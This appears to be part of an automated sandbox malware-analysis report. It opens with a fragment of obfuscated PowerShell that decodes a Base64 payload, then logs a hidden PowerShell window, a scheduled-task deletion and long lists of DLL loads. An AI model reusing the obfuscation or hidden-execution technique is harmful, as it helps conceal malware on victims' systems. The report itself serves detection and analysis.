(blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
